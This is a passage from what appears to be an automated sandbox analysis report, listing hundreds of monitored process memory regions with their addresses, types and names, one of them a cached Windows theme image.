entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21378 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21379 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21380 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21381 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21382 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21383 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21384 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21385 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21386 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21387 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21388 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21389 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21390 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21391 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21392 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21393 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21394 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21395 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21396 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21397 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21398 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21399 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21400 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21401 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21402 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21403 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21404 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21405 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21406 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21407 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21408 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21409 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21410 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21411 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21412 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21413 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21414 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21415 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21416 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21417 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21418 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21419 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21420 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21421 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21422 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21423 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21424 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21425 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21426 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21427 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21428 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21429 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21430 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21431 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21432 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21433 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21434 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21435 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21436 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21437 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21438 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21439 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21440 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21441 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21442 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21443 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21444 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21445 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21446 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21447 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21448 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21449 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21450 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21451 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21452 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21453 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21454 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21455 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21456 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21457 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21458 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21459 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21460 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21461 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21462 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21463 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21464 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21465 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21466 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21467 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21468 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21469 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21470 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21471 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21472 start_va = 0x4140000 end_va = 0x4150fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 21473 start_va = 0xbef0000 end_va = 0xc3e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bef0000" filename = "" Region: id = 21474 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21475 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21476 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21477 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21478 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21479 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21480 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21481 start_va = 0x570000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21482 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21483 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21484 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21485 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21486 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21487 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21488 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21489 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21490 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21491 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21492 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21493 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21494 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21495 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21496 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21497 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21498 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21499 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21500 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21501 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21502 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 21503 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21504 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21505 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21506 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21507 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21508 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21509 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21510 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21511 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21512 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 21513 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21514 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21515 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21516 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21517 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21518 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21519 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21520 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21521 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 21522 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21523 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21524 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21525 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21526 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21527 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21528 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21529 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21530 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21531 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21532 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21533 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21534 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21535 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 21536 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21537 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21538 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21539 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21540 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21541 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21542 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21543 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21544 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21545 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21546 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21547 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21548 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21549 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21550 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21551 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21552 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21553 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21554 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21555 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21556 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21557 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21558 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21559 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21560 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21561 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21562 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21563 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21564 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21565 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21566 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21567 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21568 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21569 start_va = 0x2100000 end_va = 0x210efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 21570 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 21571 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 21572 start_va = 